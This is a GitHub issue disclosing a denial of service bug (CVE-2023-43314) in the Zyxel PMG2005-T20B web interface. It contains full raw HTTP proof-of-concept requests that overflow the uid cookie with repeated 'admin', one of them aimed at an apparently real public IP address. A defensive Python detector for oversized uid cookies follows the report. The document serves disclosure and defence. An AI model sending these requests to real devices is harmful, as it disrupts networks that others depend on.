CVE-2023-43314: ZYXEL-PMG2005-T20B has a denial of service vulnerability · Issue #1 · Rumble00/Rumble
Buffer Overflow vulnerability in ZYXEL ZYXEL v.PMG2005-T20B allows a remote attacker to cause a denial of service via a crafted script to the uid parameter in the cgi-bin/login.asp component.
Zyxel is a leading global provider of comprehensive communication and information solutions, providing innovative technology and product solutions for telecom operators, government and enterprise customers, and consumers worldwide. ZYXEL-PMG2005-T20B has a denial of service vulnerability. Attackers can exploit this vulnerability to cause the browser to crash.
Trigger: using a valid SESSIONID for the ZYXEL-PMG2005-T20B product, when the number of repetitions of admin in the uid reaches 50, backend parsing can cause any web application of the product ZYXEL-PMG2005-T20B to crash.
The following are the details of the vulnerability:
1. Vulnerability Address: http://177.221.16.243/cgi-bin/login.asp
Request Package:
GET /cgi-bin/index.asp HTTP/1.1
Host: 177.221.16.243
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://177.221.16.243/cgi-bin/login.asp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: SESSIONID=4450a48a; uid=adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin; psw=1234
Connection: close
Browser crashes after execution
Request package is:
GET /cgi-bin/index.asp HTTP/1.1
Host: IP
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://IP/cgi-bin/login.asp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie:SESSIONID=4450a48a; uid=adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin; psw=1234
Connection: close
Replacing the two IP placeholders above (in the Host and Referer headers) with the target IP can cause the browser to crash.
The following is a vulnerability replay video:
https://github.com/Rumble00/Rumble/assets/145107465/c1ad7082-513f-427f-9706-30c75097d586
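
A defender-side check for the request pattern reported above, added here as an example and not part of the original report: it parses a raw request to a /cgi-bin/ path and flags a uid cookie longer than a login name plausibly needs, reporting the repeated unit. MAX_UID_LEN = 64, the function names and the sample requests (192.0.2.10 is a documentation address) are assumptions.

```python
# Added example, not part of the original report.
MAX_UID_LEN = 64              # assumption: upper bound for a legitimate login name
WATCHED_PREFIX = "/cgi-bin/"  # path prefix taken from the report

def parse_request(raw):
    """Return (path, headers) from a raw HTTP/1.x request head."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = [ln for ln in head.split("\n") if ln.strip()]
    parts = lines[0].split() if lines else []
    path = parts[1] if len(parts) >= 2 else ""
    headers = {}
    for ln in lines[1:]:
        name, _, value = ln.partition(":")
        headers[name.strip().lower()] = value.strip()
    return path, headers

def cookie_pairs(header):
    """Split a Cookie header into a dict; tolerates 'Cookie:NAME=...' with no space."""
    pairs = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            pairs[name.strip()] = value.strip()
    return pairs

def repeating_unit(s):
    """Smallest unit that s is a whole-number repetition of, and the count."""
    i = (s + s).find(s, 1)
    return (s[:i], len(s) // i) if 0 < i < len(s) else (s, 1)

def check_request(raw):
    """Return a finding dict for an oversized uid cookie, else None."""
    path, headers = parse_request(raw)
    if not path.startswith(WATCHED_PREFIX):
        return None
    uid = cookie_pairs(headers.get("cookie", "")).get("uid", "")
    if len(uid) <= MAX_UID_LEN:
        return None
    unit, repeats = repeating_unit(uid)
    return {"path": path, "uid_len": len(uid), "unit": unit, "repeats": repeats}

def sample(uid):
    """Constructed sample request; host and cookie values are placeholders."""
    return ("GET /cgi-bin/index.asp HTTP/1.1\r\nHost: 192.0.2.10\r\n"
            f"Cookie:SESSIONID=00000000; uid={uid}; psw=x\r\n"
            "Connection: close\r\n\r\n")

if __name__ == "__main__":
    for uid in ("admin", "admin" * 50):
        print(len(uid), check_request(sample(uid)))
```

The same length bound can be enforced at a reverse proxy in front of the management interface, so an oversized uid never reaches the device's parser.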